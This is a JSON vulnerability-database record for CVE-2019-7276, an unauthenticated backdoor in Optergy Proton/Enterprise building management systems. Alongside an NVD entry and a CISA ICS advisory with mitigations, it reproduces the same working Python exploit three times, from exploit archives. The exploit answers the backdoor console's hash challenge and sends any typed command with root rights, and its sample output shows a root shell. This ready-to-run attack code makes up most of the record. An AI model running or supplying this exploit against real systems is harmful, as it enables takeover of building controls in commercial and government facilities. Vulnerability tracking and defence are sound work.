{"cve": [{"lastseen": "2021-02-02T07:13:04", "description": "Optergy Proton/Enterprise devices allow Remote Root Code Execution via a Backdoor Console.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-07-01T20:15:00", "title": "CVE-2019-7276", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-7276"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:optergy:proton:2.3.0a", "cpe:/a:optergy:enterprise:2.3.0a"], "id": "CVE-2019-7276", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-7276", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:optergy:enterprise:2.3.0a:*:*:*:*:*:*:*", "cpe:2.3:a:optergy:proton:2.3.0a:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2019-12-04T19:58:37", "description": "Exploit for hardware platform in category web applications", "edition": 1, "published": "2019-11-12T00:00:00", "title": "Optergy 2.3.0a - Remote Code Execution (Backdoor) Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-7276"], "modified": "2019-11-12T00:00:00", "id": "1337DAY-ID-33515", "href": "https://0day.today/exploit/description/33515", "sourceData": "# Title: Optergy 2.3.0a - Remote Code Execution\r\n# Author: LiquidWorm\r\n# Vendor: https://optergy.com/\r\n# Product web page: https://optergy.com/products/\r\n# Affected version: <=2.3.0a\r\n# Advisory: https://applied-risk.com/resources/ar-2019-008\r\n# Paper: https://applied-risk.com/resources/i-own-your-building-management-system\r\n# CVE: CVE-2019-7276\r\n\r\n# PoC:\r\n\r\n#!/usr/bin/env python\r\n#\r\n# Unauthenticated Remote Root Exploit in Optergy BMS (Console Backdoor)\r\n#\r\n# Affected version <=2.0.3a (Proton and Enterprise)\r\n#\r\n##############################################################################\r\n#\r\n# [email\u00a0protected]:~/stuff/optergy$ python getroot.py 192.168.232.19\r\n# Challenge received: 1547540929287\r\n# SHA1: 56a6e5bf103591ed45faa2159cae234d04f06d93\r\n# MD5 from SHA1: 873efc9ca9171d575623a99aeda44e31\r\n# Answer: 56a6e5bf103591ed45faa2159cae234d04f06d93873efc9ca9171d575623a99aeda44e31\r\n# # id\r\n# uid=0(root) gid=0(root) groups=0(root)\r\n#\r\n##############################################################################\r\n#\r\n#\r\n\r\nimport os#######\r\nimport sys######\r\nimport json#####\r\nimport hashlib##\r\nimport requests#\r\n\r\npiton = os.path.basename(sys.argv[0])\r\n\r\nif len(sys.argv) < 2:\r\n print '\\n\\x20\\x20[*] Usage: '+piton+' <ip:port>\\n'\r\n sys.exit()\r\n\r\nwhile True:\r\n\r\n challenge_url = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html?get'\r\n\r\n try:\r\n req1 = requests.get(challenge_url)\r\n get_challenge = json.loads(req1.text)\r\n challenge = get_challenge['response']['message']\r\n print 'Challenge received: ' + challenge\r\n\r\n hash_object = hashlib.sha1(challenge.encode())\r\n print 'SHA1: '+(hash_object.hexdigest())\r\n h1 = (hash_object.hexdigest())\r\n hash_object = hashlib.md5(h1.encode())\r\n print 'MD5 from SHA1: '+(hash_object.hexdigest())\r\n h2 = (hash_object.hexdigest())\r\n print 'Answer: '+h1+h2\r\n \r\n zeTargets = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html'\r\n zeCommand = raw_input('# ')\r\n if zeCommand.strip() == 'exit':\r\n sys.exit()\r\n zeHeaders = {'User-Agent' : 'BB/BMS-251.4ev4h',\r\n 'Accept' : '*/*',\r\n 'Accept-Encoding' : 'gzip, deflate',\r\n 'Accept-Language' : 'mk-MK,mk;q=1.7',\r\n 'Connection' : 'keep-alive',\r\n 'Connection-Type' : 'application/x-www-form-urlencoded'}\r\n zePardata = {'command' : 'sudo '+zeCommand,\r\n 'challenge' : challenge,\r\n 'answer' : h1+h2}\r\n\r\n zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)\r\n get_resp = json.loads(zeRequest.text)\r\n get_answ = get_resp['response']['message']\r\n print get_answ\r\n except Exception:\r\n print '[*] Error!'\r\n break\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/33515"}], "packetstorm": [{"lastseen": "2019-11-14T02:21:26", "description": "", "published": "2019-11-12T00:00:00", "type": "packetstorm", "title": "Optergy BMS 2.0.3a Remote Root", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-7276"], "modified": "2019-11-12T00:00:00", "id": "PACKETSTORM:155258", "href": "https://packetstormsecurity.com/files/155258/Optergy-BMS-2.0.3a-Remote-Root.html", "sourceData": "`#!/usr/bin/env python \n# \n# Unauthenticated Remote Root Exploit in Optergy BMS (Console Backdoor) \n# \n# Affected version <=2.0.3a (Proton and Enterprise) \n# Discovered by Gjoko 'LiquidWorm' Krstic \n# \n# CVE: CVE-2019-7276 \n# Advisory: https://applied-risk.com/resources/ar-2019-008 \n# \n############################################################################## \n# \n# lqwrm@metalgear:~/stuff/optergy$ python getroot.py 192.168.232.19 \n# Challenge received: 1547540929287 \n# SHA1: 56a6e5bf103591ed45faa2159cae234d04f06d93 \n# MD5 from SHA1: 873efc9ca9171d575623a99aeda44e31 \n# Answer: 56a6e5bf103591ed45faa2159cae234d04f06d93873efc9ca9171d575623a99aeda44e31 \n# # id \n# uid=0(root) gid=0(root) groups=0(root) \n# \n############################################################################## \n# \n# \n \nimport os####### \nimport sys###### \nimport json##### \nimport hashlib## \nimport requests# \n \npiton = os.path.basename(sys.argv[0]) \n \nif len(sys.argv) < 2: \nprint '\\n\\x20\\x20[*] Usage: '+piton+' <ip:port>\\n' \nsys.exit() \n \nwhile True: \n \nchallenge_url = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html?get' \n \ntry: \nreq1 = requests.get(challenge_url) \nget_challenge = json.loads(req1.text) \nchallenge = get_challenge['response']['message'] \nprint 'Challenge received: ' + challenge \n \nhash_object = hashlib.sha1(challenge.encode()) \nprint 'SHA1: '+(hash_object.hexdigest()) \nh1 = (hash_object.hexdigest()) \nhash_object = hashlib.md5(h1.encode()) \nprint 'MD5 from SHA1: '+(hash_object.hexdigest()) \nh2 = (hash_object.hexdigest()) \nprint 'Answer: '+h1+h2 \n \nzeTargets = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html' \nzeCommand = raw_input('# ') \nif zeCommand.strip() == 'exit': \nsys.exit() \nzeHeaders = {'User-Agent' : 'BB/BMS-251.4ev4h', \n'Accept' : '*/*', \n'Accept-Encoding' : 'gzip, deflate', \n'Accept-Language' : 'mk-MK,mk;q=1.7', \n'Connection' : 'keep-alive', \n'Connection-Type' : 'application/x-www-form-urlencoded'} \nzePardata = {'command' : 'sudo '+zeCommand, \n'challenge' : challenge, \n'answer' : h1+h2} \n \nzeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata) \nget_resp = json.loads(zeRequest.text) \nget_answ = get_resp['response']['message'] \nprint get_answ \nexcept Exception: \nprint '[*] Error!' \nbreak \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/155258/ar-2019-008.txt"}], "exploitdb": [{"lastseen": "2019-11-13T18:28:31", "description": "", "published": "2019-11-12T00:00:00", "type": "exploitdb", "title": "Optergy 2.3.0a - Remote Code Execution (Backdoor)", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-7276"], "modified": "2019-11-12T00:00:00", "id": "EDB-ID:47641", "href": "https://www.exploit-db.com/exploits/47641", "sourceData": "# Title: Optergy 2.3.0a - Remote Code Execution\r\n# Author: LiquidWorm\r\n# Date: 2019-11-05\r\n# Vendor: https://optergy.com/\r\n# Product web page: https://optergy.com/products/\r\n# Affected version: <=2.3.0a\r\n# Advisory: https://applied-risk.com/resources/ar-2019-008\r\n# Paper: https://applied-risk.com/resources/i-own-your-building-management-system\r\n# CVE: CVE-2019-7276\r\n\r\n# PoC:\r\n\r\n#!/usr/bin/env python\r\n#\r\n# Unauthenticated Remote Root Exploit in Optergy BMS (Console Backdoor)\r\n#\r\n# Affected version <=2.0.3a (Proton and Enterprise)\r\n#\r\n##############################################################################\r\n#\r\n# lqwrm@metalgear:~/stuff/optergy$ python getroot.py 192.168.232.19\r\n# Challenge received: 1547540929287\r\n# SHA1: 56a6e5bf103591ed45faa2159cae234d04f06d93\r\n# MD5 from SHA1: 873efc9ca9171d575623a99aeda44e31\r\n# Answer: 56a6e5bf103591ed45faa2159cae234d04f06d93873efc9ca9171d575623a99aeda44e31\r\n# # id\r\n# uid=0(root) gid=0(root) groups=0(root)\r\n#\r\n##############################################################################\r\n#\r\n#\r\n\r\nimport os#######\r\nimport sys######\r\nimport json#####\r\nimport hashlib##\r\nimport requests#\r\n\r\npiton = os.path.basename(sys.argv[0])\r\n\r\nif len(sys.argv) < 2:\r\n print '\\n\\x20\\x20[*] Usage: '+piton+' <ip:port>\\n'\r\n sys.exit()\r\n\r\nwhile True:\r\n\r\n challenge_url = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html?get'\r\n\r\n try:\r\n req1 = requests.get(challenge_url)\r\n get_challenge = json.loads(req1.text)\r\n challenge = get_challenge['response']['message']\r\n print 'Challenge received: ' + challenge\r\n\r\n hash_object = hashlib.sha1(challenge.encode())\r\n print 'SHA1: '+(hash_object.hexdigest())\r\n h1 = (hash_object.hexdigest())\r\n hash_object = hashlib.md5(h1.encode())\r\n print 'MD5 from SHA1: '+(hash_object.hexdigest())\r\n h2 = (hash_object.hexdigest())\r\n print 'Answer: '+h1+h2\r\n \r\n zeTargets = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html'\r\n zeCommand = raw_input('# ')\r\n if zeCommand.strip() == 'exit':\r\n sys.exit()\r\n zeHeaders = {'User-Agent' : 'BB/BMS-251.4ev4h',\r\n 'Accept' : '*/*',\r\n 'Accept-Encoding' : 'gzip, deflate',\r\n 'Accept-Language' : 'mk-MK,mk;q=1.7',\r\n 'Connection' : 'keep-alive',\r\n 'Connection-Type' : 'application/x-www-form-urlencoded'}\r\n zePardata = {'command' : 'sudo '+zeCommand,\r\n 'challenge' : challenge,\r\n 'answer' : h1+h2}\r\n\r\n zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)\r\n get_resp = json.loads(zeRequest.text)\r\n get_answ = get_resp['response']['message']\r\n print get_answ\r\n except Exception:\r\n print '[*] Error!'\r\n break", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/47641"}], "ics": [{"lastseen": "2021-02-27T19:50:27", "bulletinFamily": "info", "cvelist": ["CVE-2019-7272", "CVE-2019-7273", "CVE-2019-7274", "CVE-2019-7275", "CVE-2019-7276", "CVE-2019-7277", "CVE-2019-7278", "CVE-2019-7279"], "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 10.0**\n\n * **ATTENTION:** Exploitable remotely/low skill level to exploit\n * **Vendor: **Optergy\n * **Equipment:** Proton/Enterprise Building Management System\n * **Vulnerabilities: **Information Exposure, Cross-site Request Forgery, Unrestricted Upload of File with Dangerous Type, Open Redirect, Hidden Functionality, Exposed Dangerous Method or Function, Use of Hard-coded Credentials\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could allow an attacker to achieve remote code execution and gain full system access.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of Proton/Enterprise Building Management Systems, are affected:\n\n * Proton/Enterprise Versions 2.3.0a and prior\n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [INFORMATION EXPOSURE CWE-200](<https://cwe.mitre.org/data/definitions/200.html>)\n\nThe application suffers from username disclosure via its username reset functionality. An attacker can enumerate and disclose all the valid users on the system. Furthermore, when calling a certain page from a remote location, the following internal information can be divulged for the current system: Name, Internal IP Address, Netmask, Hostname, Gateway, DNS Server, and DNS Server 2.\n\n[CVE-2019-7272](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-7272>) and [CVE-2019-7277](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-7277>) have been assigned to these vulnerabilities. A CVSS v3 base score of 5.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N>)).\n\n#### 3.2.2 [CROSS-SITE REQUEST FORGERY (CSRF) CWE-352](<https://cwe.mitre.org/data/definitions/352.html>)\n\nThe affected application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious website.\n\n[CVE-2019-7273](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-7273>) has been assigned to this vulnerability. A CVSS v3 base score of 5.0 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L>)).\n\n#### 3.2.3 [UNRESTRICTED UPLOAD OF FILE WITH DANGEROUS TYPE CWE-434](<https://cwe.mitre.org/data/definitions/434.html>)\n\nThe vulnerability exists due to the absence of file extension validation when uploading files through the badge image upload script. A remote and unauthenticated attacker can upload files with arbitrary extensions into a directory within application\u2019s web root and execute them with privileges of the web server.\n\n[CVE-2019-7274](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-7274>) has been assigned to this vulnerability. A CVSS v3 base score of 9.9 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H>)).\n\n#### 3.2.4 [URL REDIRECTION TO UNTRUSTED SITE ('OPEN REDIRECT') CWE-601](<https://cwe.mitre.org/data/definitions/601.html>)\n\nThis vulnerability can be exploited to redirect a user to an arbitrary website; e.g., when a user clicks a specially crafted link to the affected script hosted on a trusted domain.\n\n[CVE-2019-7275](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-7275>) has been assigned to this vulnerability. A CVSS v3 base score of 3.1 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N>)).\n\n#### 3.2.5 [HIDDEN FUNCTIONALITY CWE-912](<https://cwe.mitre.org/data/definitions/912.html>)\n\nAttackers can directly navigate to an undocumented backdoor script and gain full system access. This allows unauthenticated code execution with highest privileges.\n\n[CVE-2019-7276](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-7276>) has been assigned to this vulnerability. A CVSS v3 base score of 10.0 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H>)).\n\n#### 3.2.6 [EXPOSED DANGEROUS METHOD OR FUNCTION CWE-749](<https://cwe.mitre.org/data/definitions/749.html>)\n\nUnauthenticated users may be able to use undeclared class functions to access certain resources directly.\n\n[CVE-2019-7278](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-7278>) have been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>)).\n\n#### 3.2.7 [USE OF HARD-CODED CREDENTIALS CWE-798](<https://cwe.mitre.org/data/definitions/798.html>)\n\nAttackers can use CVE-2019-7278 to send unauthorized SMS messages to any phone number depending on the stored credits to the hard-coded credentials in the function.\n\n[CVE-2019-7279](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-7279>) have been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>))\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Commercial Facilities, Government Facilities\n * **COUNTRIES/AREAS DEPLOYED:** Worldwide\n * **COMPANY HEADQUARTERS LOCATION:** United States\n\n### 3.4 RESEARCHER\n\nGjoko Krstic of Applied Risk reported these vulnerabilities to Optergy.\n\n## 4\\. MITIGATIONS\n\nOptergy recommends the following procedure to remediate these issues:\n\n * Update Optergy server to Version 2.4.5 (or later) to remediate the issues described in this advisory (Proton and Optergy Enterprise).\n * Contact an Optergy Reseller who has access to this no charge software update.\n * If unsure who to contact, send email to [info@optergy.com](<mailto:info@optergy.com>)\n\nThe latest Optergy software updates include important security updates including enhancements to prevent unwanted intrusion. In addition to these software updates, Optergy emphasizes it is important for users to ensure the site network is also secure to add an extra layer of security. To keep the Optergy system safer from unintended access, Optergy recommends the following:\n\n * Close Port 22 or disable port forwarding to Optergy server for Port 22 (SSH). This port is only used for technical support to remotely diagnose problems. If Port 22 is needed, open only for the duration of the support activity. Default state should be closed.\n * Use secure SSL (Secure Socket Layer) connections when crossing Internet, this means using an enterprise LAN that has firewalls and routers to block incoming traffic. Alternatively, deploy the Optergy OpenVPN, which is built in and offers encrypted communication. Optergy supports SSL for encrypted communication.\n * Use strong passwords. A strong password has a minimum of 12 characters, includes numbers, symbols, capital letters, lowercase letters, is not a Dictionary word or combination of Dictionary words, and doesn\u2019t rely on obvious substitutions.\n * Never share passwords. Concurrent logins can be prevented in web server and portal preferences.\n * Use expiring passwords. Users of the system come and go, an expiring password will at least keep out people who may be no longer authorized to use the system.\n * Always regularly update your software. Optergy updates always include stability, security, and other enhancements to maximize performance and reduce risk of downtime.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\nNCCIC also recommends that users take the following measures to protect themselves from social engineering attacks:\n\n * Do not click web links or open unsolicited attachments in email messages.\n * Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.\n * Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.\n\nNo known public exploits specifically target these vulnerabilities.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSA-19-157-01>); we'd welcome your feedback.\n", "modified": "2019-06-06T00:00:00", "published": "2019-06-06T00:00:00", "id": "ICSA-19-157-01", "href": "https://www.us-cert.gov/ics/advisories/ICSA-19-157-01", "type": "ics", "title": "Optergy Proton Enterprise Building Management System", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}